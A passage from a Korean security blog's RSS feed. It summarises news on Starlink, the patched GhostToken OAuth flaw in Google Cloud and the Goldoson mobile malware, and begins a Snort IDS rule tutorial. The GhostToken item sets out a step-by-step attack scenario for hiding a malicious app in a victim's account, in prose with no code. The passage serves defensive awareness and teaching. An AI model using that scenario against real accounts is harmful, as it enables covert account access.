      <pubDate>Thu, 27 Apr 2023 22:52:44 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 과기정통부가 바라보는 스타링크 한국 상륙 '초읽기'​​​​​​​​​​</title>
      <link>https://jennana.tistory.com/624</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;855&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cQZUFN/btscIKdaA5G/5NJnesJKQaki22vtDvOU7K/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cQZUFN/btscIKdaA5G/5NJnesJKQaki22vtDvOU7K/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cQZUFN/btscIKdaA5G/5NJnesJKQaki22vtDvOU7K/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcQZUFN%2FbtscIKdaA5G%2F5NJnesJKQaki22vtDvOU7K%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;540&quot; height=&quot;855&quot; data-origin-width=&quot;540&quot; data-origin-height=&quot;855&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;올해 상반기 일론 머스크의 스타링크라는 스페이스X가 운영하는 위성 인터넷 사업이 국내에 출시를 앞두고 있는 가운데 과학기술정보통신부에서는 B2C보다는 선박, 항공과 같은 특수목적에 이용되어 경쟁력을 제한적으로 보고 있다고 했다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt; * B2C : 기업소비자간 거래, B2B : 기업간거래&lt;br&gt;&lt;br&gt;- 스타링크 : 2020년 서비스를 시작했으며, 현재는 4000여개의 위성을 기반으로 전세계 50여 개국의 인터넷을 제공하고 있음. 2030년에 4만개 이상의 위성을 배치한다는 목표가 있음.&lt;br&gt;기존의 위성 통신망과 수중 광케이블의 단점을 개선하고 유선 인터넷과 무선 통신망의 한계를 극복한 위상 기반의 인터넷 사업.&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;김수민 기자, 과기정통부가 바라보는 스타링크 한국 상륙 '초읽기', 블로터, &lt;a href=&quot;https://n.news.naver.com/article/293/0000043610?sid=105&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://n.news.naver.com/article/293/0000043610?sid=105&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;과기정통부가 바라보는 스타링크 한국 상륙 '초읽기'&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;일론 머스크의 스타링크가 국내 시장 진출을 앞둔 가운데, 정부가 아직은 경쟁력이 제한적이라는 입장을 내비쳤다. 박윤규 과학기술정보통신부(이하 과기정통부) 제2차관은 최근 광화문 국가과&quot; data-og-host=&quot;n.news.naver.com&quot; data-og-source-url=&quot;https://n.news.naver.com/article/293/0000043610?sid=105&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/fU9ys/hySotJb3IM/mX5R1kd7lyVuae23j7KKjk/img.png?width=600&amp;amp;height=338&amp;amp;face=251_0_591_125&quot; data-og-url=&quot;https://n.news.naver.com/article/293/0000043610&quot;&gt;&lt;a href=&quot;https://n.news.naver.com/article/293/0000043610&quot; target=&quot;_blank&quot; data-source-url=&quot;https://n.news.naver.com/article/293/0000043610?sid=105&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/fU9ys/hySotJb3IM/mX5R1kd7lyVuae23j7KKjk/img.png?width=600&amp;amp;height=338&amp;amp;face=251_0_591_125')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;과기정통부가 바라보는 스타링크 한국 상륙 '초읽기'&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;일론 머스크의 스타링크가 국내 시장 진출을 앞둔 가운데, 정부가 아직은 경쟁력이 제한적이라는 입장을 내비쳤다. 박윤규 과학기술정보통신부(이하 과기정통부) 제2차관은 최근 광화문 국가과&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;n.news.naver.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/624</guid>
      <comments>https://jennana.tistory.com/624#entry624comment</comments>
      <pubDate>Tue, 25 Apr 2023 23:58:46 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 구글 클라우드에서 발견된 유령, 영원히 &amp;lsquo;삭제 중&amp;rsquo; 상태 유지하며 사라졌다 나타났다</title>
      <link>https://jennana.tistory.com/623</link>
      <description>&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;983&quot; data-origin-height=&quot;919&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nvj7t/btscvw0HhZG/cCtsFThJWekicEa5QJkrIK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nvj7t/btscvw0HhZG/cCtsFThJWekicEa5QJkrIK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nvj7t/btscvw0HhZG/cCtsFThJWekicEa5QJkrIK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fnvj7t%2Fbtscvw0HhZG%2FcCtsFThJWekicEa5QJkrIK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;983&quot; height=&quot;919&quot; data-origin-width=&quot;983&quot; data-origin-height=&quot;919&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;구글 클라우드 플랫폼(GCP)에서 발견된 고스트토큰(GhostToken)이라는 취약점은 서드파티앱의 토큰을 악용하여 악성 애플리케이션을 피해자의 구글 계정에 심을 수 있으며 해당 애플리케이션은 완전 삭제되지 않고 피해자가 보이지 않게 '삭제 중'으로 남아있어 추후에 다시 악용이 가능하고 발견이 쉽지 않다고 한다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;[&amp;nbsp;공격 원리 ]&lt;br&gt;- GCP라는 공간에 앱 스토어가 존재하는데 그중에서 비공식 서드파티 앱 스토어들을 이용할 경우 앱을 다운로드하면 토큰(Token)이 부여되고 해당 토큰을 이용해 사용자의 구글 계정에 접근 가능&lt;br&gt;- 고스트토큰 취약점을 이용하여 앱을 앱 스토어에 심어 넣을 경우 멀웨어가 구글 계정에 접근할 수 있는데 관리 페이지에는 공격자의 앱이 표시되지 않도록 해 탐지되기 어렵게 한다. 일종의 보이지 않는 앱(Ghost APP)&lt;br&gt;&lt;br&gt;[ 공격 시나리오 ]&lt;br&gt;1) 피해자가 OAuth 기반 애플리케이션을 승인하도록 속여 피해자의 구글 계정 토근이 공격자에게 전달.&lt;br&gt;2) 인증된 OAuth 기반 애플리케이션과 관련 프로젝트를 삭제. 그러면 '삭제 중' 상태가 됨. (삭제가 된 것도 아니고 안된 것도 아닌 상태이기 때문에 사용자의 앱목록에 나타나지 않음)&lt;br&gt;3) 해당 애플리케이션을 복구하면 새로운 토큰이 생성되고, 사용자의 정보에 접근&lt;br&gt;4) 정보 접근 이후 다시 프로젝트를 삭제하면 애플리케이션이 '삭제 중' 상태가 됨. 유령상태&lt;br&gt;&lt;br&gt;[ 구글의 조치 ]&lt;br&gt;- '삭제 중' 상태가 지속 중이어도 해당 앱이 목록에 나타나도록 패치&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 구글 클라우드에서 발견된 유령, 영원히 ‘삭제 중’ 상태 유지하며 사라졌다 나타났다., 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=117371&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=117371&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;구글 클라우드에서 발견된 유령, 영원히 ‘삭제 중’ 상태 유지하며 사라졌다 나타났다&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;구글 클라우드 플랫폼(GCP)에서 보안 취약점이 하나 발견됐다. 이 취약점을 익스플로잇 할 경우 공격자들은 악성 애플리케이션을 피해자의 구글 계정에 심을 수 있게 된다. 이러한 악성 애플리케&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117371&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/byRT1H/hySm3RyHnZ/0Cl2AH9Q0NkbMlk5q2pFqk/img.jpg?width=750&amp;amp;height=596&amp;amp;face=0_0_750_596&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=117371&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=117371&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=117371&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/byRT1H/hySm3RyHnZ/0Cl2AH9Q0NkbMlk5q2pFqk/img.jpg?width=750&amp;amp;height=596&amp;amp;face=0_0_750_596')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;구글 클라우드에서 발견된 유령, 영원히 ‘삭제 중’ 상태 유지하며 사라졌다 나타났다&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;구글 클라우드 플랫폼(GCP)에서 보안 취약점이 하나 발견됐다. 이 취약점을 익스플로잇 할 경우 공격자들은 악성 애플리케이션을 피해자의 구글 계정에 심을 수 있게 된다. 이러한 악성 애플리케&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/623</guid>
      <comments>https://jennana.tistory.com/623#entry623comment</comments>
      <pubDate>Mon, 24 Apr 2023 16:23:24 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼</title>
      <link>https://jennana.tistory.com/622</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;966&quot; data-origin-height=&quot;751&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/u9ikW/btsbTooCrOJ/qqyFrCJWhEr4tYc86rHCMK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/u9ikW/btsbTooCrOJ/qqyFrCJWhEr4tYc86rHCMK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/u9ikW/btsbTooCrOJ/qqyFrCJWhEr4tYc86rHCMK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fu9ikW%2FbtsbTooCrOJ%2FqqyFrCJWhEr4tYc86rHCMK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;966&quot; height=&quot;751&quot; data-origin-width=&quot;966&quot; data-origin-height=&quot;751&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;맥아피가 발견한 골도슨(Godoson)이라는 데이터 탈취와 클릭 사기 기능의 멀웨어가 서드파티 라이브러리를 통해서 60개 이상의 모바일 앱을 감염시켰으며 구글 플레이 스토어에서 1억 회 이상, 원스토어에서 800만 회 이상 다운로드되었다. 한국에서 사용되는 L.Point, L.Pay, 등이 포함되어 있어서 앱 사용자들은 빠른 업데이트다 필요해 보인다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- 감염된 앱 :&lt;br&gt;1) L.POINT&lt;br&gt;2) L.PAY&lt;br&gt;3) Swipe Brick Breaker&lt;br&gt;4) Money Manager Expense &amp;amp; Budget&lt;br&gt;5) Lotte Cinema&lt;br&gt;6) Live Score&lt;br&gt;7) GOM&lt;br&gt;&lt;br&gt;- 골도슨의 작동 방식 :&lt;br&gt;골도슨 라이브러리는 장비를 감염.&lt;br&gt;곧바로 공격자들의 C&amp;amp;C 서버에 등록.&lt;br&gt;원격에 저장된 설정 파일들을 다운. &lt;br&gt;화면에서는 앱이 정상적으로 실행. &lt;br&gt;라이브러리 이름과 원격 서버 도메인을 매번 바꾸기 때문에 잘 탐지되지 않음.&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼, 보안뉴스, &lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=117273&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;http://www.boannews.com/media/view.asp?idx=117273&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;데이터 탈취와 클릭 사기 기능을 가진 멀웨어가 서드파티 라이브러리를 통해 60개가 넘는 모바일 앱을 감염시키는 데 성공했다. 이 앱들은 구글 플레이 스토어를 통해 1억 회 이상 다운로드 됐다&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;http://www.boannews.com/media/view.asp?idx=117273&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bMAyey/hySkR4i0tS/xgj0QXc0zzKEnIhMnfEJZ1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=117273&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=117273&quot; target=&quot;_blank&quot; data-source-url=&quot;http://www.boannews.com/media/view.asp?idx=117273&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bMAyey/hySkR4i0tS/xgj0QXc0zzKEnIhMnfEJZ1/img.jpg?width=750&amp;amp;height=500&amp;amp;face=0_0_750_500')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;엘포인트, 롯데시네마, 곰 등 감염시킨 골도슨 멀웨어, 1억 회 다운로드 돼&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;데이터 탈취와 클릭 사기 기능을 가진 멀웨어가 서드파티 라이브러리를 통해 60개가 넘는 모바일 앱을 감염시키는 데 성공했다. 이 앱들은 구글 플레이 스토어를 통해 1억 회 이상 다운로드 됐다&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/622</guid>
      <comments>https://jennana.tistory.com/622#entry622comment</comments>
      <pubDate>Fri, 21 Apr 2023 21:26:56 +0900</pubDate>
    </item>
    <item>
      <title>[네트워크 보안 기술] Snort</title>
      <link>https://jennana.tistory.com/621</link>
      <description>&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;Snort&lt;/b&gt;&lt;/h2&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: center;&quot;&gt;Snort는 프로토콜 분석, 콘텐츠 검색, 웜, 취약점 공격, 포트 스캔, 버퍼 오버플로우 등 다양한 공격을 탐지하는 OpenSource IDS&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h2 style=&quot;text-align: left;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;Snort의 구조 &lt;/b&gt;&lt;/h2&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;Snort는 네 가지 요소로 구성이 되어 있다. &lt;br&gt;Sniffer → Preprocessor → Detection Engine → Alert/Logging&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;1. Sniffer &lt;/span&gt;&lt;/b&gt;&lt;br&gt;네트워크를 도청하는데 쓰이는 하드웨어 또는 소프트웨어 장치 애플리케이션 또는 하드웨어 장치에서 해당 네트워크의 트래픽을 도청할 수 있다. &lt;br&gt;&lt;br&gt;[ 용도 ]&amp;nbsp;&lt;br&gt;&amp;nbsp; - 네트워크 분석과 문제를 해결. &lt;br&gt;&amp;nbsp; - 성능 분석과 벤치마킹 평문 비밀번호가 기타 데이터를 도청 &lt;br&gt;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;2. Preprocessor &lt;/span&gt;&lt;/b&gt;&lt;br&gt;패킷 Sniffer로부터 전달받은 패킷을 특정한 플러그인으로 전달하여 패킷에서 특정한 종류의 행위를 찾는다. 패킷에서 특정한 행위를 찾은 뒤에 Detection Engine으로 전송하게 된다. &lt;br&gt;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;3. Detection Engine &lt;/span&gt;&lt;/b&gt;&lt;br&gt;Preprocessor로부터 패킷을 전달받아 패킷과 일치하는 Ruleset이 있다면 해당 패킷은 Alert/ Logging으로 전달된다. &lt;br&gt;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;4. Alert / Logging &lt;/span&gt;&lt;/b&gt;&lt;br&gt;Detection Engine과 일치하는 패킷이 있다면 경고가 발생하는데, 이때 경고는 로그 파일, SMB, SNMP 트랩 등으로 전달된다. Syslog와 같은 툴을 사용하면 E-mail을 통해 관리자에게 실시간으로 전달. &lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h2 style=&quot;text-align: left;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;Snort Rule&lt;/b&gt;&lt;/h2&gt;&lt;div&gt; 
 &lt;p data-ke-size=&quot;size18&quot;&gt;&amp;nbsp;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size18&quot;&gt;&lt;span&gt;snort rule / signature는 크게 &lt;/span&gt;&lt;span&gt;&lt;b&gt;헤더&lt;/b&gt;&lt;/span&gt;&lt;span&gt;와 &lt;/span&gt;&lt;span&gt;&lt;b&gt;옵션&lt;/b&gt;&lt;/span&gt;&lt;span&gt; 부분으로 구성&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;​&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt;Rule Header&lt;/b&gt; - 처리 방식, 프로토콜, IP 주소, 포트 번호 등 처리할 패킷을 판단하는 기준 명시&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;b&gt;Rule Option&lt;/b&gt; - 패킷을 탐지하기 위한 규칙을 명시&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt; 
&lt;/div&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #EE2323;&quot;&gt;1. Rule Header(룰 헤더)&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;1. rule actions &lt;/span&gt;&lt;/b&gt;- 8가지&lt;br&gt;1) alert : 선택한 경고 방법에 따른 alert 발생 + 로그 기록&lt;br&gt;2) log : 로그를 저장&lt;br&gt;3) pass : 패킷을 무시&lt;br&gt;4) activate : alert 발생 + dynamic rule 활성화&lt;br&gt;5) dynamic : activate rule에 의해 활성화 + log rule과 동일하게 동작&lt;br&gt;6) drop : 패킷 차단 + 로그&lt;br&gt;7) reject : drop rule과 동일하게 패킷을 차단 + 로그, TCP인 경우 TCP Reset 전송, UPD인 경우 ICMP Port unreachable 메시지 전송&lt;br&gt;8) sdrop : 패킷 차단 but 로그 남기지 않음&lt;br&gt;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;2. protocols &lt;/span&gt;&lt;/b&gt;: 탐지할 프로토콜 4가지 TCP, UDP, ICMP, IP&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;3. IP Address&lt;/span&gt;&lt;/b&gt;&lt;br&gt;1) 모든 주소 : any&lt;br&gt;2) 단일 주소 : 192.168.0.1&lt;br&gt;3) 복수 주소 : [192.168.0.1 192.168.0.2] 또는 [192.168.0.0/24]&lt;br&gt;4) 부정 : !192.168.0.1 !192.168.0.0/24&lt;br&gt;5) 내부IP 주소 : $HOME_NET, 외부IP 주소 : $EXTERNAL_NET&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;4. Port Numbers&lt;/span&gt;&lt;/b&gt;&lt;br&gt;1) 모든 주소 : any&lt;br&gt;2) 단일 포트 : 80&lt;br&gt;3) 여러개 포트 : 1:500 (1~500까지)&lt;br&gt;4) 부정 : !80&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;&lt;span style=&quot;color: #0076C8;&quot;&gt;5. Direction Operator&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: #009991;&quot;&gt; &lt;/span&gt;: 방향 지시지&lt;br&gt;1) -&amp;gt; 단방향: 출발지 -&amp;gt; 목적지&lt;br&gt;2) &amp;lt;&amp;gt; 양방향&lt;br&gt;3) &amp;lt;- 방향지시자는 없음&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;헤더 사용예&lt;/p&gt;&lt;div&gt; 
 &lt;table style=&quot;border-collapse: collapse; width: 100%; height: 34px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style7&quot;&gt; 
  &lt;tbody&gt; 
   &lt;tr style=&quot;height: 17px;&quot;&gt; 
    &lt;td style=&quot;width: 10.5648%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;action&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 13.4717%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;protocol&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 17.0764%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;ip address&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 10.216%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;port&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 14.7508%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;direction&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 24.2858%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;ip address&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 9.63454%; height: 17px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;port&lt;/span&gt;&lt;/b&gt;&lt;/td&gt; 
   &lt;/tr&gt; 
   &lt;tr style=&quot;height: 17px;&quot;&gt; 
    &lt;td style=&quot;width: 10.5648%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;alert&lt;/span&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 13.4717%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;TCP&lt;/span&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 17.0764%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;any&lt;/span&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 10.216%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;any&lt;/span&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 14.7508%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 24.2858%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;192.168.133.0/24&lt;/span&gt;&lt;/td&gt; 
    &lt;td style=&quot;width: 9.63454%; height: 17px;&quot;&gt;&lt;span style=&quot;font-family: 'Nanum Gothic';&quot;&gt;80&lt;/span&gt;&lt;/td&gt; 
   &lt;/tr&gt; 
  &lt;/tbody&gt; 
 &lt;/table&gt; 
